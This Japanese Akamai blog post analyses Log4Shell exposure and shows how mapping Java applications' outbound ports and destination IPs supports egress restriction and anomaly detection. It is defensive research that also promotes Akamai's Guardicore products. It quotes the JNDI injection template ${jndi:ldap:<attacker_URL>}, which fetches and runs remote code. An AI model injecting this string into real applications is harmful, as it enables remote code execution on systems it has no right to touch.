Log4Shell の定量化：脆弱性の大規模な発生

サーバーの脆弱性は、アクセス性によってさらに悪化します。この脆弱性そのものでも十分な懸念材料になりますが、インターネットに面したサーバーは、ネットワークに侵入するための攻撃ベクトルとして使用される可能性があるため、さらにリスクをもたらします。Akamai が Log4j インターネットトラフィックの傾向に関して実施した 調査 から、攻撃者は可能なあらゆる方法で、そして驚くほどの数でこの脆弱性を悪用しようとしていることがわかります。

今回の調査では、Java サーバー側アプリケーションを実行しているデータセンターの 91% が危険な状態でした。そのうち 40% 以上にインターネットに面した Java サーバーが含まれていることで、事態はさらに複雑になります。インターネットに面したサーバーは、外部から簡単にアクセスできるため、悪用がはるかに簡単です。このブログの次のセクションでは、Java アプリケーションのアウトバウンド通信に焦点を当てます。また、Java アプリケーションを実行するインターネットに面したサーバーを監視し、セキュリティを確保することを検討している場合に推奨される緩和策をいくつか提案します。

ただし、Java サーバーがすべて内部にあるデータセンター（つまり、インターネットに面していないデータセンター）が安全だとみなすことはできません。Log4Shell は、主としてネットワークを侵害する手段だと認識されていますが、内部サーバーで実行されている Java アプリケーションがインターネットに面したサーバーからログを受信し、最終的にセキュリティが侵害されたことを示すケースもありました。Log4Shell は、最初のセキュリティ侵害と同様に、ラテラルムーブメント（侵入拡大）にも容易に使用できます。

データ支援型の緩和策

Log4Shell が特に強力になるのは、攻撃者が制御するリモートのマシンからペイロードを被害者にダウンロードして実行する場合です。これを行うために、攻撃者はログメッセージを ${jndi:ldap:<attacker_URL>} の形式で挿入します。これにより最終的に、脆弱なアプリケーションプロセスから埋め込み URL への接続がトリガーされます。その後、リモート Java クラスオブジェクトがダウンロードされ、メモリー内で実行されます。

Akamai Threat Labs はこのことを把握しており、Java サーバー、特に Log4Shell に対して脆弱な複数のアプリケーションの通信パターンについてマッピングを開始しました。Java サーバーとプロセスが定期的に通信する方法を理解することで、セキュリティ担当者と IT 担当者は、環境の異常を検知して緩和するための重要な情報を得て、最終的に、Log4Shell のエクスプロイトを阻止し、通常の業務を継続できます。 

送信のマッピング：Java サーバーの通信方法

Java サーバーとインターネット間の通信の方法を理解するために、まず Java アプリケーションがインターネットへの接続に使用する宛先 TCP ポートの数を数値化しました。当社の分析によると、インターネットに面したサーバーの大部分は、非常に少数のポート（10 未満）で通信しています。

このことから、データセンター内でさまざまなサーバーやプロセスからの送信許可を制限することの重要性とセキュリティ上のメリットが明白になります。つまり、特定のポートセットを介してこれまで通信してきたプロセスから宛先ポートへの初めての通信を特定すれば、攻撃の試行を識別するうえで有効だということです。

当社では、複数の一般的な Java アプリケーションについて、より詳細な調査を継続しています。

アプリケーション固有の通信パターン

Akamai Threat Labs では、Akamai Guardicore Segmentation 独自のプロセスレベルの可視化により、Log4Shell に対して脆弱な特定のアプリケーションのふるまいに関する詳細情報の収集が可能です。このデータを使用して、これらのプロセスの正常なふるまいを調査し、異常を検知し、それに応じて効果的なセグメンテーションルールを作成できます。

チームは、一般的な 4 つの脆弱なアプリケーションの通信パターンを調査しました（括弧内はネットワークトラフィックをトリガーするプロセス）。

• Elasticsearch： さまざまなユースケースに対応する非常に人気の高い全文検索エンジン（%elasticsearch%/bin/java）

• Logstash： データのインジェストと変換に使用されるサーバー側のデータ処理パイプライン（/usr/share/logstash/jdk/bin/java）

• VMware vCenter： VMware 仮想マシンおよび ESXi ホスト用の管理プラットフォーム（%\VMware\vCenter Server\%\bin\java.exe）

• Okta RADIUS エージェント： RADIUS 認証を Okta ID 管理ソリューションに委任するために使用されるエージェント（okta-radius.exe）

当社は、次の疑問点に関する回答を求めていました。

• アプリケーションは通常どの宛先ポートに接続するか。

• 具体的には、宛先がインターネット上にある場合、アプリケーションはどのポートに接続するか。

さまざまな本番環境から収集されたデータを考察した結果、特有の知見を得ることができました。それは、アプリケーションのインターネット宛先ポートの数が非常に限られているということです。

ただし、ポートを確認するだけで十分だとは限りません。攻撃者がペイロードのダウンロードに使用するポートを上記のポートに変更すれば、痕跡を簡単に隠すことができます。

このデータからより有用な結論を導き出すためには、これらのポートを介した通常のアクティビティの構成を理解する手段として、宛先 IP アドレスを調べる必要がありました。IP アドレスを使用すると、攻撃の痕跡を隠すことが著しく困難になります。あるサーバーがインターネット上の 1 つの IP アドレスだけと通信する場合、攻撃者はその IP の背後にあるサーバーを制御して、そこから悪性ペイロードを処理する必要があります。したがって、宛先 IP の調査は防御に有効です。

分析によって、それぞれのアプリケーションが各ポートに対して接続する IP アドレスの平均数が得られました。アドレス数が少ないと、予防や検知の可能性が広がります。つまり、アプリケーションが非常に少数の IP アドレスと通信している場合、それ以外のすべての接続は疑わしいと見なすことができるのです。

ポート 443 および 80 の宛先 IP アドレスの数を調べたところ、ほとんどすべての場合で、その数は時間の経過とともに小さくなり安定していきました。

脆弱なアプリケーションの多くでは接続パターン（宛先ポートと宛先 IP の両方について）が非常に限定的なことを理解しておくと、アタックサーフェスの削減と攻撃検知の両方に活用できます。

結論

Log4Shell の脆弱性に対して最も推奨される緩和策は、パッチを適用したバージョンのライブラリーを使用することです。しかし、実際の本番環境では、パッチの適用が必ずしも実行可能でなく、迅速でもありません。

脆弱な各種アプリケーションの通信のふるまいに関する当社の調査結果は、アタックサーフェスを減らし、Log4Shell（およびその他の攻撃）のエクスプロイトを検知するための別のアプローチを示唆しています。

ネットワーク管理者の方々には、脆弱なアプリケーションの通信パターンを調査し、宛先 IP アドレスと宛先ポートの両方について、アウトバウンド接続をマッピングすることをお勧めします。この知識を念頭に、既知の標準通信ポートでのみトラフィックを許可することで、防御者はこれらの接続を必要最小限に限定できます。

接続のブロックが選択肢とならない場合は、新規のポートや IP アドレスでは、インターネットに面したサーバーからの接続での異常なふるまいがないか監視することをお勧めします。Akamai Guardicore Segmentation をご利用いただくと、プロセスレベルの情報を活用して、各サーバーが実行するさまざまな接続の可視性を強化できます。当社の脅威ハンティングチームは、Guardicore Hunt のお客様のためにこのデータを事前に調査しています。

Log4Shell 攻撃の緩和策の詳細については、次のブログをご覧ください。 Akamai Guardicore Segmentation を使用した Log4j 不正使用の緩和策